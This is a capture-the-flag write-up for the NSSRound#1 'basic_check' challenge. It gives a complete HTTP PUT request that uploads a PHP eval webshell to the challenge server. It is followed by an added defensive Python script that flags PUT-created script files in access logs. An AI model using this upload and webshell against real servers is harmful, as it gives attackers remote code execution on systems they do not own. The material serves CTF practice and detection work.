[NSSRound#1 Basic]basic_check

POC

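This challenge only requires knowing that the server allows the PUT method. Once we know it accepts file uploads, we can directly construct the following request. (nikto can be used to scan for this; for usage, see the article "nikto使用教程" (nikto usage tutorial).)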

PUT /b.php HTTP/1.1
Host: 1.14.71.254:28202
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 29



<?php eval($_POST[a]); ?>

This uploads the trojan to b.php, which can then be connected to with a webshell tool.
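From the defender's side, the same sequence (a successful PUT that creates a script file, followed by requests to that file) is visible in the web server's access log. The sketch below is an added example, not part of the original write-up; it assumes the Apache/nginx "combined" log format, and the log lines, IP addresses and the `find_put_uploads` name are constructed for illustration.

```python
import re

# Constructed sample access-log lines ("combined" format); not from the write-up.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Mar/2023:10:00:01 +0000] "OPTIONS / HTTP/1.1" 200 0 "-" "scanner"
203.0.113.7 - - [01/Mar/2023:10:00:05 +0000] "PUT /b.php HTTP/1.1" 201 0 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Mar/2023:10:00:09 +0000] "PUT /notes.txt HTTP/1.1" 201 0 "-" "curl/8.0"
198.51.100.9 - - [01/Mar/2023:10:00:12 +0000] "PUT /x.php HTTP/1.1" 405 0 "-" "curl/8.0"
203.0.113.7 - - [01/Mar/2023:10:00:20 +0000] "POST /b.php HTTP/1.1" 200 17 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Mar/2023:10:00:30 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "curl/8.0"
"""

# client, timestamp, method, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Extensions a server may execute rather than serve as static content.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|jsp|jspx|asp|aspx)$", re.IGNORECASE)


def find_put_uploads(log_text):
    """Return one finding per script file created by a successful PUT."""
    uploaded = {}  # path -> finding
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, ts, method, target, status = m.groups()
        path = target.split("?", 1)[0]
        status = int(status)
        if method == "PUT" and 200 <= status < 300 and SCRIPT_EXT.search(path):
            uploaded[path] = {"path": path, "uploader": ip, "time": ts,
                              "later_requests": []}
        elif path in uploaded and status < 400:
            # Any later successful request to the uploaded script is suspicious.
            uploaded[path]["later_requests"].append((ip, method, ts))
    return list(uploaded.values())


if __name__ == "__main__":
    for f in find_put_uploads(SAMPLE_LOG):
        severity = "HIGH" if f["later_requests"] else "MEDIUM"
        print(f'[{severity}] {f["uploader"]} PUT {f["path"]} at {f["time"]}; '
              f'follow-ups: {f["later_requests"]}')
```

A finding like this points back to the root cause in the write-up: the web root accepts PUT, so the fix is to disable that method (or WebDAV) for any directory where scripts execute.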